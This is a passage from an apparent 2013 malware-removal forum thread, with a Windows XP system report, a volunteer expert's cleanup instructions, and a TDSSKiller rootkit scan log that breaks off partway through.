"BFBCBAE3-8293-4215-9C4F-C2402C118EDB" = Otto from Hewlett-Packard Desktops (remove only)
"C2C3C2DB-7D8A-4E20-B527-E3149FAECC3A" = Slyder from Hewlett-Packard Desktops (remove only)
"CCleaner" = CCleaner
"DivX Setup" = DivX Setup
"ERUNT_is1" = ERUNT 1.1j
"Eusing Free Registry Cleaner" = Eusing Free Registry Cleaner
"F5215F01-DFC0-475D-A910-6F1AF94E807E" = Tradewinds from Hewlett-Packard Desktops (remove only)
"getPlus®_ocx" = getPlus®_ocx
"Google Chrome" = Google Chrome
"HP Document Manager" = HP Document Manager 1.0
"HP Imaging Device Functions" = HP Imaging Device Functions 10.0
"HP Instant Support" = HP Instant Support
"HP Photo & Imaging" = HP Image Zone 4.2
"HP Photosmart Essential" = HP Photosmart Essential 2.5
"HP Smart Web Printing" = HP Smart Web Printing
"HP Solution Center & Imaging Support Tools" = HP Solution Center 10.0
"HPExtendedCapabilities" = HP Customer Participation Program 10.0
"HPOCR" = OCR Software by I.R.I.S. 10.0
"HPTOOLKIT" = Toolkit View(HP)
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"InstallShield_{54DE0B75-6CD9-44C4-B10A-1F25DA9899D8}" = Quicken 2004
"KaraFun_is1" = KaraFun 1.17a
"LeapFTP" = LeapFTP
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.70.0.1100
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox 18.0 (x86 en-US)" = Mozilla Firefox 18.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"Photo To Sketch_is1" = Photo To Sketch 3.51
"Premiumplay Codec-C" = Premiumplay Codec-C
"PrimoPDF" = PrimoPDF -- brought to you by Nitro PDF Software
"PrimoPDF4.0.1" = PrimoPDF
"PS2" = PS2
"Python 2.2 combined Win32 extensions" = Python 2.2 combined Win32 extensions
"Python 2.2.1" = Python 2.2.1
"Shop for HP Supplies" = Shop for HP Supplies
"WIC" = Windows Imaging Component
"Windows Live OneCare safety scanner" = Windows Live OneCare safety scanner
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Windows Media Player 11
"Windows XP Service Pack" = Windows XP Service Pack 3
"Windstream_BCUC" = Windstream Broadband Check-up Center
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC" = XML Paper Specification Shared Components Pack 1.0

========== HKEY_CURRENT_USER Uninstall List ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"BitTorrent DNA" = DNA
"e44d5ab8e5bc2330" = Karaoke File Converter

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 1/19/2013 12:30:33 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 1/19/2013 12:30:37 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

Error - 1/19/2013 12:30:39 AM | Computer Name = YOUR-46E94OWX6A | Source = Application Hang | ID = 1002
Description = Hanging application firefox.exe, version 18.0.0.4752, hang module
hungapp, version 0.0.0.0, hang address 0x00000000.

[ System Events ]
Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The SAS Core Service service failed to start due to the following
error: %%3

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The AVG Free WatchDog service failed to start due to the following
error: %%3

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7000
Description = The mrtRate service failed to start due to the following error: %%2

Error - 1/19/2013 12:22:43 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7001
Description = The AVG Free E-mail Scanner service depends on the AVG Free WatchDog
service which failed to start because of the following error: %%3

Error - 1/19/2013 12:24:07 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7022
Description = The HP CUE DeviceDiscovery Service service hung on starting.

Error - 1/19/2013 12:24:11 AM | Computer Name = YOUR-46E94OWX6A | Source = Service Control Manager | ID = 7023
Description = The HP CUE DeviceDiscovery Service service terminated with the following
error: %%2147500037

< End of report >

#12
RKinner

Posted 19 January 2013 - 12:12 AM

Malware Expert

Expert
24,624 posts

Did you see my post about running TDSSkiller again?

Uninstall:

Java™ 6 Update 11 Current version but all versions of Java are dangerous and vulnerable to hackers. We recommend Java be removed.
Java™ 6 Update 3 Old versions are worse and must be removed.
Java™ 6 Update 5
Java™ 6 Update 7
Java 2 Runtime Environment, SE v1.4.2_03
Adobe Reader 8.1.2 Old versions of Reader are dangerous. Remove and then get the latest reader from adobe.com. Uncheck any additional software they offer you during the download. You don't want the ask or yahoo toolbars or the Mcafee Security Scan
Adobe Reader 9.4.1
Eusing Free Registry Cleaner Never use registry cleaners. They can destroy your system.
getPlus®_ocx Unneeded download program installed by adobe.com
DNA P2P programs are dangerous.
SUPERAntiSpyware Broken

Following is for the HP CUE Device Discovery Service errors:

1. Click on the start menu and click on 'Run', and then type 'services.msc' and press the Enter button.
2. In the Services window, look for HP CUE Device Discovery Service, and double click on it.
3. You should see a button labelled 'STOP'. click on that button.
4. Above this, you should find something which says 'Startup Type'. Change that to 'Disabled'
5. Click on the 'Apply' button and close all windows.

Following is for the AVG errors:

Download and save the AVG removal tool
http://download.avg....6_2011_1184.exe
Run the tool.

Download the adwCleaner

Run the Tool
Windows Vista and Windows 7 users:
Right click in the adwCleaner.exe and select the option
Select the Delete button.
When the scan completes, it will open a notepad windows.
Please, copy the content of this file in your next reply.

Open IE then click on the gear then Click the Safety button, point to SmartScreen Filter, and then click Turn Off SmartScreen Filter. In the Microsoft? SmartScreen Filter dialog box, click OK.

Run OTL again and do a QUickscan and post the log.

How is it running now?

#13
goodseed

Posted 19 January 2013 - 08:14 AM

Member

Topic Starter
Member
49 posts

08:08:10.0859 2044 TDSS rootkit removing tool 2.8.15.0 Oct 31 2012 21:47:35
08:08:11.0343 2044 ============================================================
08:08:11.0343 2044 Current date / time: 2013/01/19 08:08:11.0343
08:08:11.0343 2044 SystemInfo:
08:08:11.0343 2044
08:08:11.0343 2044 OS Version: 5.1.2600 ServicePack: 3.0
08:08:11.0343 2044 Product type: Workstation
08:08:11.0343 2044 ComputerName: YOUR-46E94OWX6A
08:08:11.0343 2044 UserName: Owner
08:08:11.0343 2044 Windows directory: C:\WINDOWS
08:08:11.0343 2044 System windows directory: C:\WINDOWS
08:08:11.0343 2044 Processor architecture: Intel x86
08:08:11.0343 2044 Number of processors: 2
08:08:11.0343 2044 Page size: 0x1000
08:08:11.0343 2044 Boot type: Normal boot
08:08:11.0343 2044 ============================================================
08:08:12.0390 2044 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x50C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xF0, Type 'K0', Flags 0x00000054
08:08:12.0625 2044 ============================================================
08:08:12.0625 2044 \Device\Harddisk0\DR0:
08:08:12.0625 2044 MBR partitions:
08:08:12.0625 2044 \Device\Harddisk0\DR0\Partition1: MBR, Type 0xB, StartLBA 0x3F, BlocksNum 0x9B7FE1
08:08:12.0625 2044 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x9B8020, BlocksNum 0x1205CBE0
08:08:12.0625 2044 ============================================================
08:08:12.0671 2044 C: <-> \Device\Harddisk0\DR0\Partition2
08:08:12.0671 2044 D: <-> \Device\Harddisk0\DR0\Partition1
08:08:12.0671 2044 ============================================================
08:08:12.0671 2044 Initialize success
08:08:12.0671 2044 ============================================================
08:08:16.0359 0224 ============================================================
08:08:16.0359 0224 Scan started
08:08:16.0359 0224 Mode: Manual;
08:08:16.0359 0224 ============================================================
08:08:17.0421 0224 ================ Scan system memory ========================
08:08:17.0421 0224 System memory - ok
08:08:17.0421 0224 ================ Scan services =============================
08:08:17.0453 0224 Aavmker4 - ok
08:08:17.0468 0224 Abiosdsk - ok
08:08:17.0484 0224 abp480n5 - ok
08:08:17.0500 0224 ACPI - ok
08:08:17.0500 0224 ACPIEC - ok
08:08:17.0515 0224 adpu160m - ok
08:08:17.0531 0224 aec - ok
08:08:17.0546 0224 AFD - ok
08:08:17.0562 0224 AFS2K - ok
08:08:17.0562 0224 AgereSoftModem - ok
08:08:17.0578 0224 Aha154x - ok
08:08:17.0593 0224 aic78u2 - ok
08:08:17.0609 0224 aic78xx - ok
08:08:17.0609 0224 Alerter - ok
08:08:17.0625 0224 ALG - ok
08:08:17.0640 0224 AliIde - ok
08:08:17.0656 0224 AmdK7 - ok
08:08:17.0671 0224 amsint - ok
08:08:17.0687 0224 AppMgmt - ok
08:08:17.0687 0224 Arp1394 - ok
08:08:17.0703 0224 asc - ok
08:08:17.0718 0224 asc3350p - ok
08:08:17.0734 0224 asc3550 - ok
08:08:17.0781 0224 aspnet_state - ok
08:08:17.0796 0224 aswFsBlk - ok
08:08:17.0796 0224 aswMon2 - ok
08:08:17.0812 0224 AswRdr - ok
08:08:17.0828 0224 aswSnx - ok
08:08:17.0843 0224 aswSP - ok
08:08:17.0859 0224 aswTdi - ok
08:08:17.0859 0224 AsyncMac - ok
08:08:17.0875 0224 atapi - ok
08:08:17.0890 0224 Atdisk - ok
08:08:17.0906 0224 Atmarpc - ok
08:08:17.0921 0224 AudioSrv - ok
08:08:17.0921 0224 audstub - ok
08:08:17.0937 0224 avast! Antivirus - ok
08:08:17.0984 0224 Beep - ok
08:08:17.0984 0224 BITS - ok
08:08:18.0000 0224 Bonjour Service - ok
08:08:18.0015 0224 Browser - ok
08:08:18.0031 0224 BVRPMPR5 - ok
08:08:18.0046 0224 catchme - ok
08:08:18.0046 0224 cbidf2k - ok
08:08:18.0062 0224 cd20xrnt - ok
08:08:18.0078 0224 Cdaudio - ok
08:08:18.0093 0224 Cdfs - ok
08:08:18.0109 0224 Cdrom - ok
08:08:18.0109 0224 Changer - ok
08:08:18.0125 0224 CiSvc - ok
08:08:18.0140 0224 ClipSrv - ok
08:08:18.0156 0224 clr_optimization_v2.0.50727_32 - ok
08:08:18.0171 0224 CmdIde - ok
08:08:18.0187 0224 COMSysApp - ok
08:08:18.0218 0224 Cpqarray - ok
08:08:18.0234 0224 CryptSvc - ok
08:08:18.0234 0224 dac2w2k - ok
08:08:18.0250 0224 dac960nt - ok
08:08:18.0265 0224 DcomLaunch - ok
08:08:18.0281 0224 Dhcp - ok
08:08:18.0296 0224 Disk - ok
08:08:18.0312 0224 dmadmin - ok
08:08:18.0312 0224 dmboot - ok
08:08:18.0328 0224 dmio - ok
08:08:18.0343 0224 dmload - ok
08:08:18.0359 0224 dmserver - ok
08:08:18.0359 0224 DMusic - ok
08:08:18.0375 0224 Dnscache - ok
08:08:18.0390 0224 Dot3svc - ok
08:08:18.0406 0224 dpti2o - ok
08:08:18.0421 0224 drmkaud - ok
08:08:18.0437 0224 EapHost - ok
08:08:18.0437 0224 ERSvc - ok
08:08:18.0453 0224 eusk2par - ok
08:08:18.0468 0224 Eventlog - ok
08:08:18.0484 0224 EventSystem - ok
08:08:18.0500 0224 Fastfat - ok
08:08:18.0500 0224 fasttx2k - ok
08:08:18.0515 0224 FastUserSwitchingCompatibility - ok
08:08:18.0531 0224 Fax - ok
08:08:18.0546 0224 Fdc - ok
08:08:18.0562 0224 Fips - ok
08:08:18.0578 0224 Flpydisk - ok
08:08:18.0578 0224 FltMgr - ok
08:08:18.0593 0224 FontCache3.0.0.0 - ok
08:08:18.0609 0224 Fs_Rec - ok
08:08:18.0625 0224 Ftdisk - ok
08:08:18.0640 0224 GEARAspiWDM - ok
08:08:18.0640 0224 Gpc - ok
08:08:18.0656 0224 gupdate - ok
08:08:18.0671 0224 gupdatem - ok
08:08:18.0687 0224 HDAudBus - ok
08:08:18.0703 0224 helpsvc - ok
08:08:18.0718 0224 HidServ - ok
08:08:18.0734 0224 HidUsb - ok
08:08:18.0734 0224 hkmsvc - ok
08:08:18.0750 0224 hpn - ok
08:08:18.0765 0224 hpqcxs08 - ok
08:08:18.0781 0224 hpqddsvc - ok
08:08:18.0796 0224 HPZid412 - ok
08:08:18.0812 0224 HPZipr12 - ok
08:08:18.0828 0224 HPZius12 - ok
08:08:18.0828 0224 HTTP - ok
08:08:18.0843 0224 HTTPFilter - ok
08:08:18.0859 0224 i2omgmt - ok
08:08:18.0875 0224 i2omp - ok
08:08:18.0890 0224 i8042prt - ok
08:08:18.0906 0224 ialm - ok
08:08:18.0921 0224 idsvc - ok
08:08:18.0921 0224 Imapi - ok
08:08:18.0937 0224 ImapiService - ok
08:08:18.0953 0224 ini910u - ok
08:08:18.0984 0224 IntcAzAudAddService - ok
08:08:18.0984 0224 IntelIde - ok
08:08:19.0000 0224 intelppm - ok
08:08:19.0015 0224 ip6fw - ok
08:08:19.0031 0224 IpFilterDriver - ok
08:08:19.0046 0224 IpInIp - ok
08:08:19.0062 0224 IpNat - ok
08:08:19.0062 0224 iPod Service - ok
08:08:19.0078 0224 IPSec - ok
08:08:19.0093 0224 IRENUM - ok
08:08:19.0109 0224 isapnp - ok
08:08:19.0125 0224 Iviaspi - ok
08:08:19.0140 0224 JavaQuickStarterService - ok
08:08:19.0156 0224 Kbdclass - ok
08:08:19.0171 0224 kmixer - ok
08:08:19.0187 0224 KSecDD - ok
08:08:19.0187 0224 L8042pr2 - ok
08:08:19.0218 0224 lanmanserver - ok
08:08:19.0218 0224 lanmanworkstation - ok
08:08:19.0234 0224 lbrtfdc - ok
08:08:19.0250 0224 LmHosts - ok
08:08:19.0265 0224 LMouFlt2 - ok
08:08:19.0281 0224 McciCMService - ok
08:08:19.0296 0224 Messenger - ok
08:08:19.0312 0224 mnmdd - ok
08:08:19.0312 0224 mnmsrvc - ok
08:08:19.0328 0224 Modem - ok
08:08:19.0343 0224 Mouclass - ok
08:08:19.0359 0224 mouhid - ok
08:08:19.0375 0224 MountMgr - ok
08:08:19.0375 0224 MozillaMaintenance - ok
08:08:19.0390 0224 MpKsl08115bda - ok
08:08:19.0406 0224 mraid35x - ok
08:08:19.0421 0224 MREMP50 - ok
08:08:19.0437 0224 MREMPR5 - ok
08:08:19.0453 0224 MRENDIS5 - ok
08:08:19.0468 0224 MRESP50 - ok
08:08:19.0484 0224 mrtRate - ok
08:08:19.0484 0224 MRxDAV - ok
08:08:19.0500 0224 MRxSmb - ok
08:08:19.0515 0224 MSDTC - ok
08:08:19.0531 0224 Msfs - ok
08:08:19.0546 0224 MSIServer - ok
08:08:19.0562 0224 MSKSSRV - ok
08:08:19.0578 0224 MSPCLOCK - ok
08:08:19.0593 0224 MSPQM - ok
08:08:19.0593 0224 mssmbios - ok
08:08:19.0609 0224 Mup - ok
08:08:19.0625 0224 napagent - ok
08:08:19.0640 0224 NDIS - ok
08:08:19.0640 0224 NdisTapi - ok
08:08:19.0656 0224 Ndisuio - ok
08:08:19.0671 0224 NdisWan - ok
08:08:19.0671 0224 NDProxy - ok
08:08:19.0687 0224 Net Driver HPZ12 - ok
08:08:19.0703 0224 NetBIOS - ok
08:08:19.0703 0224 NetBT - ok
08:08:19.0718 0224 NetDDE - ok
08:08:19.0718 0224 NetDDEdsdm - ok
08:08:19.0734 0224 Netlogon - ok
08:08:19.0734 0224 Netman - ok
08:08:19.0750 0224 NetTcpPortSharing - ok
08:08:19.0750 0224 NIC1394 - ok
08:08:19.0765 0224 Nla - ok
08:08:19.0781 0224 Npfs - ok
08:08:19.0781 0224 Ntfs - ok
08:08:19.0796 0224 NtLmSsp - ok
08:08:19.0796 0224 NtmsSvc - ok
08:08:19.0812 0224 Null - ok
08:08:19.0828 0224 NwlnkFlt - ok
08:08:19.0828 0224 NwlnkFwd - ok
08:08:19.0843 0224 ohci1394 - ok
08:08:19.0843 0224 ose - ok
08:08:19.0859 0224 Parport - ok
08:08:19.0875 0224 PartMgr - ok
08:08:19.0875 0224 ParVdm - ok
08:08:19.0890 0224 PCI - ok
08:08:19.0890 0224 PCIDump - ok
08:08:19.0906 0224 PCIIde - ok
08:08:19.0906 0224 Pcmcia - ok
08:08:19.0921 0224 PDCOMP - ok
08:08:19.0921 0224 PDFRAME - ok
08:08:19.0937 0224 PDRELI - ok
08:08:19.0953 0224 PDRFRAME - ok
08:08:19.0953 0224 perc2 - ok
08:08:19.0968 0224 perc2hib - ok
08:08:19.0984 0224 Pfc - ok
08:08:20.0000 0224 PlugPlay - ok
08:08:20.0015 0224 Pml Driver HPZ12 - ok
08:08:20.0015 0224 PolicyAgent - ok
08:08:20.0031 0224 PptpMiniport - ok
08:08:20.0046 0224 Processor - ok
08:08:20.0046 0224 ProtectedStorage - ok
08:08:20.0062 0224 Ps2 - ok
08:08:20.0062 0224 PSched - ok
08:08:20.0078 0224 Ptilink - ok
08:08:20.0093 0224 PxHelp20 - ok
08:08:20.0093 0224 ql1080 - ok
08:08:20.0109 0224 Ql10wnt - ok
08:08:20.0109 0224 ql12160 - ok
08:08:20.0125 0224 ql1240 - ok
08:08:20.0125 0224 ql1280 - ok
08:08:20.0140 0224 RasAcd - ok
08:08:20.0156 0224 RasAuto - ok
08:08:20.0156 0224 Rasl2tp - ok
08:08:20.0171 0224 RasMan - ok
08:08:20.0171 0224 RasPppoe - ok
08:08:20.0187 0224 Raspti - ok
08:08:20.0187 0224 Rdbss - ok
08:08:20.0203 0224 RDPCDD - ok
08:08:20.0218 0224 RDPWD - ok
08:08:20.0234 0224 RDSessMgr - ok
08:08:20.0234 0224 redbook - ok
08:08:20.0250 0224 RemoteAccess - ok
08:08:20.0250 0224 RpcLocator - ok
08:08:20.0265 0224 RpcSs - ok
08:08:20.0281 0224 RSVP - ok
08:08:20.0281 0224 rtl8139 - ok
08:08:20.0296 0224 SamSs - ok
08:08:20.0296 0224 SASDIFSV - ok
08:08:20.0312 0224 SASKUTIL - ok
08:08:20.0312 0224 SCardSvr - ok
08:08:20.0328 0224 Schedule - ok
08:08:20.0343 0224 Secdrv - ok
08:08:20.0343 0224 seclogon - ok
08:08:20.0359 0224 SENS - ok
08:08:20.0359 0224 Serial - ok
08:08:20.0390 0224 Sfloppy - ok
08:08:20.0390 0224 SharedAccess - ok
08:08:20.0406 0224 ShellHWDetection - ok
08:08:20.0421 0224 Simbad - ok
08:08:20.0421 0224 SiS315 - ok
08:08:20.0437 0224 SISAGP - ok
08:08:20.0437 0224 SiSkp - ok
08:08:20.0453 0224 Sparrow - ok
08:08:20.0468 0224 splitter - ok
08:08:20.0468 0224 Spooler - ok
08:08:20.0484 0224 sr - ok
08:08:20.0484 0224 srservice - ok
08:08:20.0500 0224 Srv - ok
08:08:20.0515 0224 SSDPSRV - ok
08:08:20.0515 0224 StillCam - ok
08:08:20.0531 0224 stisvc - ok
08:08:20.0531 0224 swenum - ok
08:08:20.0546 0224 swmidi - ok
08:08:20.0562 0224 SwPrv - ok
08:08:20.0578 0224 symc810 - ok
08:08:20.0578 0224 symc8xx - ok
08:08:20.0593 0224 sym_hi - ok
08:08:20.0593 0224 sym_u3 - ok
08:08:20.0609 0224 sysaudio - ok
08:08:20.0625 0224 SysmonLog - ok
08:08:20.0625 0224 TapiSrv - ok
08:08:20.0640 0224 Tcpip - ok
08:08:20.0640 0224 TDPIPE - ok
08:08:20.0656 0224 TDTCP - ok
08:08:20.0656 0224 TermDD - ok
08:08:20.0671 0224 TermService - ok
08:08:20.0687 0224 Themes - ok
08:08:20.0687 0224 TosIde - ok
08:08:20.0703 0224 TrkWks - ok
08:08:20.0718 0224 Udfs - ok
08:08:20.0718 0224 ultra - ok
08:08:20.0734 0224 Update - ok
08:08:20.0750 0224 upnphost - ok
08:08:20.0750 0224 UPS - ok
08:08:20.0765 0224 usbaudio - ok
08:08:20.0781 0224 usbccgp - ok
08:08:20.0781 0224 usbehci - ok
08:08:20.0796 0224 usbhub - ok
08:08:20.0796 0224 usbohci - ok
08:08:20.0812 0224 usbprint - ok
08:08:20.0812 0224 usbscan - ok
08:08:20.0828 0224 USBSTOR - ok
08:08:20.0843 0224 usbuhci - ok
08:08:20.0843 0224 VgaSave - ok
08:08:20.0859 0224 viaagp1 - ok
08:08:20.0859 0224 viagfx - ok
08:08:20.0875 0224 ViaIde - ok
08:08:20.0890 0224 VolSnap - ok
08:08:20.0890 0224 VSS - ok
08:08:20.0906 0224 W32Time - ok
08:08:20.0921 0224 Wanarp - ok
08:08:20.0921 0224 WDICA - ok
08:08:20.0937 0224 wdmaud - ok
08:08:20.0937 0224 WebClient - ok
08:08:20.0953 0224 WinDefend - ok
08:08:20.0968 0224 winmgmt - ok
08:08:20.0984 0224 WmdmPmSN - ok
08:08:21.0000 0224 WmiApSrv - ok
08:08:21.0015 0224 WMPNetworkSvc - ok
08:08:21.0015 0224 WpdUsb - ok
08:08:21.0031 0224 WS2IFSL - ok
08:08:21.0046 0224 wscsvc - ok
08:08:21.0046 0224 wuauserv - ok
08:08:21.0062 0224 WudfPf - ok
08:08:21.0062 0224 WudfRd - ok
08:08:21.0078 0224 WudfSvc - ok
08:08:21.0093 0224 WZCSVC - ok
08:08:21.0093 0224 xmlprov - ok
08:08:21.0109 0224 ================ Scan global ===============================
08:08:21.0109 0224 [Global] - ok
08:08:21.0125 0224 ================ Scan MBR ==================================
08:08:21.0140 0224 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
08:08:21.0312 0224 \Device\Harddisk0\DR0 - ok
08:08:21.0312 0224 ================ Scan VBR ==================================
08:08:21.0312 0224 [ 29EED5D12AE78A897E7DAAD5F2670E2C ] \Device\Harddisk0\DR0\Partition1
08:08:21.0328 0224 \Device\Harddisk0\DR0\Partition1 - ok
08:08:21.0328 0224 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
08:08:21.0328 0224 \Device\Harddisk0\DR0\Partition2 - ok
08:08:21.0328 0224 ============================================================
08:08:21.0328 0224 Scan finished
08:08:21.0328 0224 ============================================================
08:08:21.0343 1356 Detected object count: 0
08:08:21.0343 1356 Actual detected object count: 0
08:08:37.0078 2240 ============================================================
08:08:37.0078 2240 Scan started
08:08:37.0078 2240 Mode: Manual; SigCheck; TDLFS;
08:08:37.0078 2240 ============================================================
08:08:37.0187 2240 ================ Scan system memory ========================
08:08:37.0187 2240 System memory - ok
08:08:37.0187 2240 ================ Scan services =============================
08:08:37.0343 2240 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
08:08:37.0875 2240 Aavmker4 - ok
08:08:37.0890 2240 Abiosdsk - ok
08:08:37.0890 2240 abp480n5 - ok
08:08:37.0953 2240 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
08:08:40.0656 2240 ACPI - ok
08:08:40.0687 2240 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
08:08:40.0890 2240 ACPIEC - ok
08:08:40.0890 2240 adpu160m - ok
08:08:40.0921 2240 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
08:08:41.0062 2240 aec - ok
08:08:41.0140 2240 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
08:08:41.0187 2240 AFD - ok
08:08:41.0203 2240 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
08:08:41.0218 2240 AFS2K - ok
08:08:41.0281 2240 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
08:08:41.0437 2240 AgereSoftModem - ok
08:08:41.0437 2240 Aha154x - ok
08:08:41.0453 2240 aic78u2 - ok
08:08:41.0468 2240 aic78xx - ok
08:08:41.0500 2240 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
08:08:41.0687 2240 Alerter - ok
08:08:41.0703 2240 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
08:08:41.0781 2240 ALG - ok
08:08:41.0781 2240 AliIde - ok
08:08:41.0828 2240 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
08:08:41.0984 2240 AmdK7 - ok
08:08:41.0984 2240 amsint - ok
08:08:42.0000 2240 AppMgmt - ok
08:08:42.0031 2240 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
08:08:42.0203 2240 Arp1394 - ok
08:08:42.0218 2240 asc - ok
08:08:42.0218 2240 asc3350p - ok
08:08:42.0234 2240 asc3550 - ok
08:08:42.0609 2240 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
08:08:42.0765 2240 aspnet_state - ok
08:08:42.0812 2240 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
08:08:42.0859 2240 aswFsBlk - ok
08:08:42.0906 2240 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
08:08:42.0921 2240 aswMon2 - ok
08:08:42.0968 2240 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
08:08:42.0984 2240 AswRdr - ok
08:08:43.0062 2240 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
08:08:43.0109 2240 aswSnx - ok
08:08:43.0171 2240 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
08:08:43.0203 2240 aswSP - ok
08:08:43.0218 2240 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
08:08:43.0234 2240 aswTdi - ok
08:08:43.0265 2240 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
08:08:43.0421 2240 AsyncMac - ok
08:08:43.0468 2240 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
08:08:43.0625 2240 atapi - ok
08:08:43.0640 2240 Atdisk - ok
08:08:43.0671 2240 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
08:08:43.0828 2240 Atmarpc - ok
08:08:43.0875 2240 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
08:08:44.0015 2240 AudioSrv - ok
08:08:44.0062 2240 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
08:08:44.0218 2240 audstub - ok
08:08:44.0312 2240 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
08:08:44.0328 2240 avast! Antivirus - ok
08:08:44.0390 2240 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
08:08:44.0562 2240 Beep - ok
08:08:44.0609 2240 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
08:08:44.0875 2240 BITS - ok
08:08:45.0031 2240 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
08:08:45.0109 2240 Bonjour Service - ok
08:08:45.0171 2240 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
08:08:45.0328 2240 Browser - ok
08:08:45.0406 2240 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
08:08:45.0468 2240 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
08:08:45.0468 2240 BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
08:08:45.0593 2240 catchme - ok
08:08:45.0625 2240 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
08:08:45.0843 2240 cbidf2k - ok
08:08:45.0843 2240 cd20xrnt - ok
08:08:45.0875 2240 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
08:08:46.0046 2240 Cdaudio - ok
08:08:46.0093 2240 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
08:08:46.0265 2240 Cdfs - ok
08:08:46.0296 2240 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
